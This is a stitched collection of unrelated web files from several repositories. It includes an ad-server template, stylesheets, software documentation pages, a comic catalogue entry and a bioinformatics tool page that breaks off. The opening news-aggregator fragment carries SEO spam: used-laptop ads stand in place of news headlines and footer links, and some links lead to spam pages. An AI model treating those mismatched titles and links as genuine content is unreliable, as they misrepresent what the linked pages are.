違約金大幅減少で完全移籍へ (日刊スポーツ) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 26 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3d712f4a9f0d5a17af803c20b36a4d9d8bec0ea2.jpg" width="120" height="170" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">145<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">中古パソコン ★機能充実!高性能ノート★ NEC VersaPro PC-VY25A 2GBメモリ 15.4型ワイド液晶 DVDマルチ Windows7Pro 中古ノートパソコン 【KingosftOffice付(2013)】 【中古】,★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 </a></div> </div> <span class='debug' style='display:none;'><!--score: 26 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3df371797c2edb03a03491018247c6d1d6d51e42.jpg" width="160" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:-20px" /></a></div> <div class="item_status"> <span class="link_num over20">62<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00010000-chibatopi-l12" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411038f25ak.html">http://factory.aedew.com/images/Core2Duo/020411038f25ak.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 12 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/5f191d984c12ff6d166bf0cb65f99c56fedea305.jpg" width="180" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:-30px" /></a></div> <div class="item_status"> <span class="link_num over20">50<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://news.nicovideo.jp/watch/nw1961232" target="_blank" class="item_direct"> - news.nicovideo.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411136i22qh.html">http://factory.aedew.com/images/Core2Duo/020411136i22qh.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 11 --></span> <div class="more"><a href="">もっと画像で見る</a></div></div> </div> </div> </div> </div> </div><!-- end field_inner --> </div><!-- end field--> <div id="footer_menu_bar" class="menu_bar"> <div id="footer_menu_bar_inner" class="menu_bar_inner"><ul><li><a href="/" class="selected">トップ</a></li><li><a href="/all/newitem/">速報</a></li><li><a href="/news/">ニュース総合</a></li><li><a href="/society/">政治経済</a></li><li><a href="/entertainment/">エンタメ</a></li><li><a href="/sports/">スポーツ</a></li><li><a href="/itnews/">IT</a></li><li><a href="/international/">海外</a></li><li><a href="/science/">科学</a></li><li><a href="/odekake/">おでかけ</a></li><li><a href="/movie/">動画</a></li><li><a href="/2ch/">2ch</a></li><li><a href="/neta/">ネタ</a></li><li><a href="/all/">すべて</a></li></ul></div> </div><!-- /menu_bar --> <div id="footer"> <div id="footer_inner"> <a href="" title="★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 "><img src="/img/logo_s.png" width="64px" height="32px" /></a>  <span class="icon_set"> <a href="" title="RSS" class="icon icon_rss"></a> <a href="http://www.twitter.com/" target="_blank" title="twitter★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 " class="icon icon_twitter"></a> <a href="https://www.facebook.com/" target="_blank" title="facebook★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 " class="icon icon_facebook"></a> </span> <br /> <a href="">このサイトについて</a> - <a href="">ご意見・お問い合わせ</a> - <a href="">★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 </a> <br /><br /> <div class="footer_copyright"> <a href="">天気アプリ</a> | <a href="">★DVDの焼ける人気ノート★ DELL Latitude D530 1GBメモリ DVDマルチ 無線LAN Windows7 【MicrosoftOffice2007】 【中古】 </a> | <a href="">画像検索</a> | <a href="">Android音楽プレイヤー</a> | <a href="">メモ帳アプリ</a> </div> </div><!-- end footer_inner--> </div><!-- end footer--> </div><!-- end main--> </body> </html>
lib/templates/admin/campaign-index-list.html
soeffing/openx_test
{*<!-- +---------------------------------------------------------------------------+ | OpenX v2.8 | | ========= | | | | Copyright (c) 2003-2009 OpenX Limited | | For contact details, see: http://www.openx.org/ | | | | This program is free software; you can redistribute it and/or modify | | it under the terms of the GNU General Public License as published by | | the Free Software Foundation; either version 2 of the License, or | | (at your option) any later version. | | | | This program is distributed in the hope that it will be useful, | | but WITHOUT ANY WARRANTY; without even the implied warranty of | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | | GNU General Public License for more details. | | | | You should have received a copy of the GNU General Public License | | along with this program; if not, write to the Free Software | | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA | +---------------------------------------------------------------------------+ $Id: campaign-index-list.html 81439 2012-05-07 23:59:14Z chris.nutting $ -->*} <div class='tableWrapper'> <div class='tableHeader'> <ul class='tableActions'> {if $isManager} <li> {if $clientId != -1} <a href='campaign-edit.php?clientid={$clientId}' class='inlineIcon iconCampaignAdd'>{t str=AddCampaign}</a> {else} <span class='inlineIcon iconCampaignAddDisabled'>{t str=AddCampaign}</span> {/if} </li> {/if} {if $isAdvertiser == false} <li class='inactive activeIfSelected'> <a id='deleteSelection' href='#' class='inlineIcon iconDelete'>{t str=Delete}</a> {literal} <script type='text/javascript'> <!-- $('#deleteSelection').click(function(event) { event.preventDefault(); if (!$(this).parents('li').hasClass('inactive')) { var ids = []; $(this).parents('.tableWrapper').find('.toggleSelection input:checked').each(function() { ids.push(this.value); }); if (!tablePreferences.warningBeforeDelete || confirm("{/literal}{t str=ConfirmDeleteCampaigns}{literal}")) { window.location = 'campaign-delete.php?clientid={/literal}{$clientId}{literal}&campaignid=' + ids.join(','); } } }); //--> </script> {/literal} </li> {/if} </ul> <ul class='tableFilters alignRight'> <li> <div class='label'> Show </div> <div class='dropDown'> <span><span>{if $hideinactive}Active campaigns{else}All campaigns{/if}</span></span> <div class='panel'> <div> <ul> <li><a href='advertiser-campaigns.php?clientid={$clientId}&hideinactive=0'>All campaigns</a></li> <li><a href='advertiser-campaigns.php?clientid={$clientId}&hideinactive=1'>Active campaigns</a></li> </ul> </div> </div> <div class='mask'></div> </div> </li> </ul> <div class='clear'></div> <div class='corner left'></div> <div class='corner right'></div> </div> <table cellspacing='0' summary=''> <thead> <tr> {if $isAdvertiser == false} <th class='first toggleAll'> <input type='checkbox' /> </th> {/if} <th class='{ox_column_class item=name order=up default=1}'> {ox_column_title item=name order=up default=1 str=Name url=advertiser-campaigns.php} </th> <th class='{ox_column_class item=status order=up default=0}'> {ox_column_title item=status order=up default=0 str=Status url=advertiser-campaigns.php} </th> <th> Type </th> <th>&nbsp; </th> <th class='last alignRight'>&nbsp; </th> </tr> </thead> {if !$from|@count} <tbody> <tr class='odd'> <td colspan='6'>&nbsp;</td> </tr> <tr class='even'> <td colspan='6' class="hasPanel"> <div class='tableMessage'> <div class='panel'> {if $clientId != -1} {if $hideinactive} {$aCount.campaigns_hidden} {t str=InactiveCampaignsHidden} {else} {t str=NoCampaigns} {/if} {else} {t str=NoCampaignsAddAdvertiser} {/if} <div class='corner top-left'></div> <div class='corner top-right'></div> <div class='corner bottom-left'></div> <div class='corner bottom-right'></div> </div> </div> &nbsp; </td> </tr> <tr class='odd'> <td colspan='6'>&nbsp;</td> </tr> </tbody> {else} <tbody> {cycle name=bgcolor values="even,odd" assign=bgColor reset=1} {foreach key=campaignId item=campaign from=$from} {cycle name=bgcolor assign=bgColor} <tr class='{$bgColor}'> {if $isAdvertiser == false} <td class='toggleSelection'> <input type='checkbox' value='{$campaignId}' /> </td> {/if} <td> {if $isAdvertiser} <a href='campaign-banners.php?clientid={$clientId}&campaignid={$campaignId}' class='inlineIcon {ox_campaign_icon status=$campaign.status}'>{$campaign.campaignname|escape:html}</a> {else} {if $isAdvertiser && $canEdit == false} <span class='inlineIcon {ox_campaign_icon status=$campaign.status}'>{$campaign.campaignname|escape:html}</span> {else} {if $campaign.system} <a href='campaign-edit.php?clientid={$clientId}&campaignid={$campaignId}' class='inlineIcon iconCampaignSystem'>{$campaign.campaignname|escape:html}</a> {else} <a href='campaign-edit.php?clientid={$clientId}&campaignid={$campaignId}' class='inlineIcon {ox_campaign_icon status=$campaign.status}'>{$campaign.campaignname|escape:html}</a> {/if} {/if} {/if} {ox_entity_id type="Campaign" id=$campaignId} </td> <td> {ox_campaign_status clientid=$clientId campaignid=$campaignId status=$campaign.status} </td> <td> {ox_campaign_type type=$campaign.type} </td> <td class='alignRight verticalActions'> {if $campaign.system != true} <ul class='rowActions'> {if $isAdvertiser == false} <li> <a href='banner-edit.php?clientid={$clientId}&campaignid={$campaignId}' class='inlineIcon iconBannerAdd'>{t str=AddBanner}</a> </li> {/if} <li> <a href='campaign-banners.php?clientid={$clientId}&campaignid={$campaignId}' class='inlineIcon iconBanners'>{t str=Banners}</a> </li> </ul> {/if} </td> <td class='hasPanel'> <div class='panel'> <table cellspacing='0' summary=''> <tr> <th>{t str=ImpressionsBooked}</th> <td>{if $campaign.impressions >= 0}{$campaign.impressions}{else}{t str=Unlimited}{/if}</td> </tr> <tr> <th>{t str=ClicksBooked}</th> <td>{if $campaign.clicks >= 0}{$campaign.clicks}{else}{t str=Unlimited}{/if}</td> </tr> {if $showconversions} <tr> <th>{t str=ConversionsBooked}</th> <td>{if $campaign.conversions >= 0}{$campaign.conversions}{else}{t str=Unlimited}{/if}</td> </tr> {/if} <tr> <th>{t str=ActivationDate}</th> <td>{$campaign.activate}</td> </tr> <tr> <th>{t str=ExpirationDate}</th> <td>{$campaign.expire}</td> </tr> <tr> <th>{t str=Priority}</th> <td>{$campaign.priority}</td> </tr> </table> <div class='corner top-left'></div> <div class='corner top-right'></div> <div class='corner bottom-left'></div> <div class='corner bottom-right'></div> </div> </td> </tr> {/foreach} </tbody> {/if} </table> </div>
sites/default/files/css/css_yTZXtDJaDiacE2_NYhqbnCnKDF6w2rNt7PvqB9dcPpE.css
binodlamsal/bemymusic
.ctools-locked{color:red;border:1px solid red;padding:1em;}.ctools-owns-lock{background:#FFFFDD none repeat scroll 0 0;border:1px solid #F0C020;padding:1em;}a.ctools-ajaxing,input.ctools-ajaxing,button.ctools-ajaxing,select.ctools-ajaxing{padding-right:18px !important;background:url(/sites/all/modules/ctools/images/status-active.gif) right center no-repeat;}div.ctools-ajaxing{float:left;width:18px;background:url(/sites/all/modules/ctools/images/status-active.gif) center center no-repeat;} div.panel-pane div.admin-links{font-size:xx-small;margin-right:1em;}div.panel-pane div.admin-links li a{color:#ccc;}div.panel-pane div.admin-links li{padding-bottom:2px;background:white;z-index:201;}div.panel-pane div.admin-links:hover a,div.panel-pane div.admin-links-hover a{color:#000;}div.panel-pane div.admin-links a:before{content:"[";}div.panel-pane div.admin-links a:after{content:"]";}div.panel-pane div.panel-hide{display:none;}div.panel-pane div.panel-hide-hover,div.panel-pane:hover div.panel-hide{display:block;position:absolute;z-index:200;margin-top:-1.5em;}div.panel-pane div.node{margin:0;padding:0;}div.panel-pane div.feed a{float:right;} .links.operations{text-transform:lowercase;}.views-field-operations .links.operations{margin-left:0;}
Schrodinger/Schrodinger_2017-1_docs/maestro_command_reference/combilibenumselectextendtablerow.html
platinhom/ManualHom
<!DOCTYPE html> <html xmlns:MadCap="http://www.madcapsoftware.com/Schemas/MadCap.xsd" lang="en-US" xml:lang="en-US" data-mc-search-type="Stem" data-mc-help-system-file-name="Documentation.xml" data-mc-path-to-help-system="../" data-mc-target-type="WebHelp2" data-mc-runtime-file-type="Topic" data-mc-preload-images="false" data-mc-in-preview-mode="false" data-mc-toc-path="Command References|Maestro Command Reference|The Maestro Command Language"> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link href="../Skins/Default/Stylesheets/Slideshow.css" rel="stylesheet" type="text/css" data-mc-generated="True" /> <link href="../Skins/Default/Stylesheets/TextEffects.css" rel="stylesheet" type="text/css" data-mc-generated="True" /> <link href="../Skins/Default/Stylesheets/Topic.css" rel="stylesheet" type="text/css" data-mc-generated="True" /> <link href="../Skins/Default/Stylesheets/Components/Styles.css" rel="stylesheet" type="text/css" data-mc-generated="True" /><title>combilibenumselectextendtablerow</title> <link href="../Resources/Stylesheets/docs.css" rel="stylesheet" /> <script src="../Resources/Scripts/custom.modernizr.js" type="text/javascript"> </script> <script src="../Resources/Scripts/jquery.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/require.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/require.config.js" type="text/javascript"> </script> <script src="../Resources/Scripts/foundation.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/plugins.min.js" type="text/javascript"> </script> <script src="../Resources/Scripts/MadCapAll.js" type="text/javascript"> </script> </head> <body><a name="aanchor7442"></a> <MadCap:concept term="Command References" /><a name="aanchor7443"></a> <MadCap:concept term="Maestro" /> <table class="NavLink" data-mc-conditions="Default.ScreenOnly"> <tr class="NavLink"> <td class="NavLeft"><span class="NavText">◀ <a class="NavLink MCXref xref xrefNavLink" href="combilibenumrenameattachment.html" xrefformat="{paratext}">combilibenumrenameattachment</a></span> </td> <td class="NavCenter"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="maestro_command_referenceTOC.htm" xrefformat="{paratext}">Maestro Command Reference Manual</a></span> </td> <td class="NavRight"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="combilibenumselectonlytablerow.html" xrefformat="{paratext}">combilibenumselectonlytablerow</a> ▶</span> </td> </tr> </table> <h1 class="title">combilibenumselectextendtablerow</h1> <p>Extends the selection to this row in the attachments table in the CombiGlide Library Enumeration. </p> <p>Syntax: <b>combilibenumselectextendtablerow</b> [&lt;row&gt; ] </p> <p>Operands:</p> <p>&lt;row&gt; </p> <p>The row number to extend the select to. </p> <table class="NavLink" data-mc-conditions="Default.ScreenOnly"> <tr class="NavLink"> <td class="NavLeft"><span class="NavText">◀ <a class="NavLink MCXref xref xrefNavLink" href="combilibenumrenameattachment.html" xrefformat="{paratext}">combilibenumrenameattachment</a></span> </td> <td class="NavCenter"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="maestro_command_referenceTOC.htm" xrefformat="{paratext}">Maestro Command Reference Manual</a></span> </td> <td class="NavRight"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="combilibenumselectonlytablerow.html" xrefformat="{paratext}">combilibenumselectonlytablerow</a> ▶</span> </td> </tr> </table> </body> </html>
styles/maintheme.css
dumlupinar-university/php-video-framework
a:visited { color: blue ; } body { margin: 1em ; margin-bottom: 0em ; background-color: #000000 ; } #head { margin-bottom: 1em ; padding: 1em ; height: 8em ; background-color: #FF9933 ; color: black ; text-align: center ; } #content{ padding: 1em; height: auto; background-color: #333366; color: white; margin-bottom: 1em; } #menu { margin-bottom: 1em ; padding: 1em ; height: 3em ; background-color: #413838 ; color: white ; } #menu ul li { display: inline ; list-style: none ; color: white ; } #menu ul li a { text-decoration: none ; padding: 1em ; color: white ; } #foot { padding: 1em ; height: 2em ; background-color: #A55D35 ; text-align: center ; color: white ; margin-bottom: 1em ; } tr, td { text-align:center ; } .error { color: white ; text-align: center ; } .title { color: white ; text-align: center ; }
_functions/get_attachments_limit.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Function Reference: get_attachments_limit()</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print.css" type="text/css" media="print"> <style id="hilight" type="text/css"></style> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff"> <table class="pagetitle" width="100%"> <tr> <td valign="top" class="pagetitle"> [ <a href="../index.html">Index</a> ] </td> <td align="right" class="pagetitle"> <h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2> </td> </tr> </table> <!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 --> <!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net --> <!-- http://phpxref.sourceforge.net/ --> <script src="../phpxref.js" type="text/javascript"></script> <script language="JavaScript" type="text/javascript"> <!-- ext='.html'; relbase='../'; subdir='_functions'; filename='index.html'; cookiekey='phpxref'; handleNavFrame(relbase, subdir, filename); logFunction('get_attachments_limit'); // --> </script> <script language="JavaScript" type="text/javascript"> if (gwGetCookie('xrefnav')=='off') document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>'); else document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>'); </script> <noscript> <p class="navlinks"> [ <a href="../nav.html" target="_top">Show Explorer</a> ] [ <a href="index.html" target="_top">Hide Navbar</a> ] </p> </noscript> [<a href="../index.html">Top level directory</a>]<br> <script language="JavaScript" type="text/javascript"> <!-- document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>'); document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">'); document.writeln('<tr><td class="searchbox-title">'); document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>'); document.writeln('<\/td><\/tr>'); document.writeln('<tr><td class="searchbox-body" id="searchbox-body">'); document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>'); document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: '); document.writeln('<input type="text" size=10 value="" name="classname"><br>'); document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: '); document.writeln('<input type="text" size=10 value="" name="funcname"><br>'); document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: '); document.writeln('<input type="text" size=10 value="" name="varname"><br>'); document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: '); document.writeln('<input type="text" size=10 value="" name="constname"><br>'); document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: '); document.writeln('<input type="text" size=10 value="" name="tablename"><br>'); document.writeln('<input type="submit" class="searchbox-button" value="Search">'); document.writeln('<\/form>'); document.writeln('<\/td><\/tr><\/table>'); document.writeln('<\/td><\/tr><\/table>'); // --> </script> <div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div> <h3>Function and Method Cross Reference</h3> <h2><a href="index.html#get_attachments_limit">get_attachments_limit()</a></h2> <b>Defined at:</b><ul> <li><a href="../inc/items/model/_item.class.php.html#get_attachments_limit">/inc/items/model/_item.class.php</a> -> <a onClick="logFunction('get_attachments_limit', '/inc/items/model/_item.class.php.source.html#l1419')" href="../inc/items/model/_item.class.php.source.html#l1419"> line 1419</a></li> </ul> <b>Referenced 2 times:</b><ul> <li><a href="../htsrv/comment_post.php.html">/htsrv/comment_post.php</a> -> <a href="../htsrv/comment_post.php.source.html#l320"> line 320</a></li> <li><a href="../htsrv/comment_post.php.html">/htsrv/comment_post.php</a> -> <a href="../htsrv/comment_post.php.source.html#l320"> line 320</a></li> </ul> <!-- A link to the phpxref site in your customized footer file is appreciated ;-) --> <br><hr> <table width="100%"> <tr><td>Generated: Sat Nov 21 22:13:19 2015</td> <td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td> </tr> </table> </body></html>
client/views/layout.html
johynpapin/Sylvaticus
<head> <title>Sylvaticus</title> <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"> <link rel="icon" href="/favicon.ico" type="image/x-icon"> </head> <template name="layout"> <div id="main"> <div class="container"> {{> yield}} </div> </div> </template>
assets/comics/Library/details/27510.html
MiniSEC/MiniSEC.github.io
<html> <HEAD> <LINK REL="StyleSheet" TYPE="text/css" HREF="exportdetails_item_standard_black.css"></LINK> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <TITLE>Uncanny X-Men, Vol. 1 #317A</TITLE> </HEAD> <BODY onload="initPage();"> <div align="center"> <div class="navigation" align="center"> <div class="navigationline"> <div class="navlink" id="first"> <a href="14176.html">First</a> </div> <div class="navlink" id="prev"> <a href="27509.html">Previous</a> </div> <div class="navlink" id="up"> <a href="../index19.html">Up</a> </div> <div class="navlink" id="next"> <a href="27511.html">Next</a> </div> <div class="navlink" id="last"> <a href="798.html">Last</a> </div> </div> </div> </div> <div id="frontcover"> <a href="../images/27510f.jpg"> <img src="../images/27510f.jpg" class="coverimage"/> </a> </div> <div id="backcover"> <a href="../images/27510b.jpg"> <img src="../images/27510b.jpg" class="coverimage"/> </a> </div> <table border="0" class="opacity"> <tr> <td id="maintitle">Uncanny X-Men, Vol. 1&#160;#317A</td> </tr> <tr> <td class="publisher">Marvel Comics</td> </tr> <tr> <td style="padding-top:4px;">In Collection <br/> <span id="indexvalue">#1988</span> <div> <span class="fieldvaluelarge">0* </span> </div> </td> </tr> <tr> <td class="fieldvaluelarge" style="padding-top:7px;">Phalanx Covenant: Generation Next - Part 3: Enter Freely And Of Your Own Will</td> </tr> <tr> <td class="fieldvaluelarge" style="padding-top:1px;"> <b>October 1994</b> </td> </tr> <tr> <td class="fieldvaluelarge" style="padding-top:1px;"> <b>Comic</b>&#160; Modern&#160;Age&#160;$2.95</td> </tr> <tr> <td class="fieldvaluelarge" style="padding-top:1px;"> <b>Read It:&#160;Yes</b>&#160;32&#160;Pages</td> </tr> </table> <br style="clear:both;"/> <div> <table border="0" width="100%" style="margin-top:5px;"> <tr> <td valign="top" width="40%"> <div id="productdetails"> <table border="0" cellspacing="0" cellpadding="0" class="opacity"> <tr> <td class="header" colspan="2">Creators</td> </tr> <tr> <td> <tr valign="top"> <td nowrap="1" class="fieldlabel">Writer</td> <td class="fieldvalue">Scott Lobdell</td> </tr> <tr valign="top"> <td nowrap="1" class="fieldlabel">Penciller</td> <td class="fieldvalue">Joe Madureira</td> </tr> <tr valign="top"> <td nowrap="1" class="fieldlabel">Inker</td> <td class="fieldvalue">Dan Green</td> </tr> <tr valign="top"> <td nowrap="1" class="fieldlabel">Colorist</td> <td class="fieldvalue">Steve Buccellato</td> </tr> <tr valign="top"> <td nowrap="1" class="fieldlabel">Letterer</td> <td class="fieldvalue">Chris Eliopoulos</td> </tr> <tr valign="top"> <td nowrap="1" class="fieldlabel">Cover Penciller</td> <td class="fieldvalue">Joe Madureira</td> </tr> <tr valign="top"> <td nowrap="1" class="fieldlabel">Cover Inker</td> <td class="fieldvalue">Dan Green</td> </tr> <tr valign="top"> <td nowrap="1" class="fieldlabel">Cover Colorist</td> <td class="fieldvalue">Steve Buccellato</td> </tr> <tr valign="top"> <td nowrap="1" class="fieldlabel">Editor</td> <td class="fieldvalue">Bob Harras</td> </tr> <tr valign="top"> <td nowrap="1" class="fieldlabel">Editor In Chief</td> <td class="fieldvalue">Tom DeFalco</td> </tr> </td> </tr> </table> </div> </td> <td valign="top"> <div id="productdetails"> <table border="0" cellspacing="0" cellpadding="0" class="opacity"> <tr> <td class="header" colspan="2">Characters</td> </tr> <tr> <td class="character">Banshee (Sean Cassidy) <br/>Blink (Clarice Ferguson) <br/>Husk (Paige Guthrie) <br/>Jubilee (Jubilation Lee) <br/>M (Monet St. Croix) <br/>Phalanx <br/>Skin (Angelo Espinosa) <br/>Synch (Everett Thomas) <br/>White Queen (Emma Frost) <br/> </td> </tr> </table> </div> </td> </tr> <tr> <td valign="top"> <p></p> <div id="productdetails"> <table border="0" cellspacing="0" cellpadding="0" class="opacity"> <tr> <td class="header" colspan="2">Product Details</td> </tr> <tr valign="top"> <td class="fieldlabel" width="10%" nowrap="1">Series Group</td> <td class="fieldvalue">X-Men</td> </tr> <tr valign="top"> <td class="fieldlabel" width="10%" nowrap="1">Genre</td> <td class="fieldvalue">Adventure, Super-Heroes, Action</td> </tr> <tr valign="top"> <td class="fieldlabel" width="10%" nowrap="1">Color</td> <td class="fieldvalue">Color</td> </tr> <tr valign="top"> <td class="fieldlabel" width="10%" nowrap="1">Barcode</td> <td class="fieldvalue">75960602461231711</td> </tr> <tr valign="top"> <td class="fieldlabel" width="10%" nowrap="1">Country</td> <td class="fieldvalue">USA</td> </tr> <tr valign="top"> <td class="fieldlabel" width="10%" nowrap="1">Language</td> <td class="fieldvalue">English</td> </tr> <tr valign="top"> <td class="fieldlabel" width="10%" nowrap="1">Release Date</td> <td class="fieldvalue">9/30/1994</td> </tr> </table> </div> </td> <td valign="top"> <p></p> <div id="personaldetails"> <table border="0" cellspacing="0" cellpadding="0" class="opacity"> <tr> <td class="header" colspan="2">Personal Details</td> </tr> <tr valign="top"> <td class="fieldlabel" width="10%" nowrap="1">Collection Status</td> <td class="fieldvalue">In Collection</td> </tr> <tr valign="top"> <td class="fieldlabel" width="10%" nowrap="1">Links</td> <td class="fieldvalue"> <a href="http://connect.collectorz.com/comics/database/the-uncanny-x-men/317a-94808" class="link">Uncanny X-Men, Vol. 1 #317A at Comic Collector Connect</a> <br/> </td> </tr> </table> </div> </td> </tr> </table> <p></p> </div> </BODY> </html>
main/protein_iep.html
pazhanir/BSAM-Suite
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta name="generator" content="WebStrom v2016.3.1 for Linux, see www.w3.org" /> /> <title>Protein Isoelectric Point</title> <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" /> <link rel="stylesheet" href="includes/stylesheet.css" type="text/css" /> <script type="text/javascript" src="scripts/sms_common.js"> </script> <script type="text/javascript" src="scripts/protein_iep.js"> </script> </head> <body class="main" onload="document.main_form.main_submit.focus()"> <!-- MAIN TABLE --> <table border="0" cellspacing="2" cellpadding="2"> <tbody> <tr> <td class="links"> <a href="index.html"><img src="includes/logo.png" alt="SMS logo" width="144" height="56" border="0" /></a> <!-- INSERT LINKS --> <div class="category"> Sequence Analysis </div> <div class="program"> <a href="codon_plot.html" onmouseover="self.status='Plots codon frequency (according to the codon table you enter) for each codon in a DNA sequence.'; return true;" onmouseout="self.status=' '; return true;">-Codon Plot</a><br /> <a href="codon_usage.html" onmouseover="self.status='Returns a standard codon usage table.'; return true;" onmouseout="self.status=' '; return true;">-Codon Usage</a><br /> <a href="cpg_islands.html" onmouseover="self.status='Returns a list of potential CpG islands.'; return true;" onmouseout="self.status=' '; return true;">-CpG Islands</a><br /> <a href="dna_mw.html" onmouseover="self.status='Calculates the molecular weight of DNA sequences.'; return true;" onmouseout="self.status=' '; return true;">-DNA Molecular Weight</a><br /> <a href="dna_pattern.html" onmouseover="self.status='Returns positions of the patterns you enter.'; return true;" onmouseout="self.status=' '; return true;">-DNA Pattern Find</a><br /> <a href="dna_stats.html" onmouseover="self.status='Returns basic sequence statistics.'; return true;" onmouseout="self.status=' '; return true;">-DNA Stats</a><br /> <a href="fuzzy_search_dna.html" onmouseover="self.status='Returns sequences that are identical or similar to a query sequence.'; return true;" onmouseout="self.status=' '; return true;">-Fuzzy Search DNA</a><br /> <a href="fuzzy_search_protein.html" onmouseover="self.status='Returns sequences that are identical or similar to a query sequence.'; return true;" onmouseout="self.status=' '; return true;">-Fuzzy Search Protein</a><br /> <a href="ident_sim.html" onmouseover="self.status='Accepts aligned sequences in FASTA format and calculates the identity and similarity of each sequence pair.'; return true;" onmouseout="self.status=' '; return true;">-Ident and Sim</a><br /> <a href="multi_rev_trans.html" onmouseover="self.status='Can be used to predict a DNA sequence in another species using a protein sequence alignment.'; return true;" onmouseout="self.status=' '; return true;">-Multi Rev Trans</a><br /> <a href="mutate_for_digest.html" onmouseover="self.status='Finds DNA sequences that can easily be converted to a restriction site.'; return true;" onmouseout="self.status=' '; return true;">-Mutate for Digest</a><br /> <a href="orf_find.html" onmouseover="self.status='Determines the positions of open reading frames.'; return true;" onmouseout="self.status=' '; return true;">-ORF Finder</a><br /> <a href="pairwise_align_codons.html" onmouseover="self.status='Returns the optimal global alignment for two coding DNA sequences.'; return true;" onmouseout="self.status=' '; return true;">-Pairwise Align Codons</a><br /> <a href="pairwise_align_dna.html" onmouseover="self.status='Returns the optimal global alignment for two DNA sequences.'; return true;" onmouseout="self.status=' '; return true;">-Pairwise Align DNA</a><br /> <a href="pairwise_align_protein.html" onmouseover="self.status='Returns the optimal global alignment for two protein sequences.'; return true;" onmouseout="self.status=' '; return true;">-Pairwise Align Protein</a><br /> <a href="pcr_primer_stats.html" onmouseover="self.status='Returns a report describing PCR primer properties'; return true;" onmouseout="self.status=' '; return true;">-PCR Primer Stats</a><br /> <a href="pcr_products.html" 